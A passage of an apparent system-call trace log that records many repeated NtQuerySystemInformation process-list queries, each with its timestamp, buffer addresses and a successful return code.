ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c0f0) returned 0x0 [0152.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c128) returned 0x0 [0152.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x1c2b8) returned 0x0 [0152.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x27058, 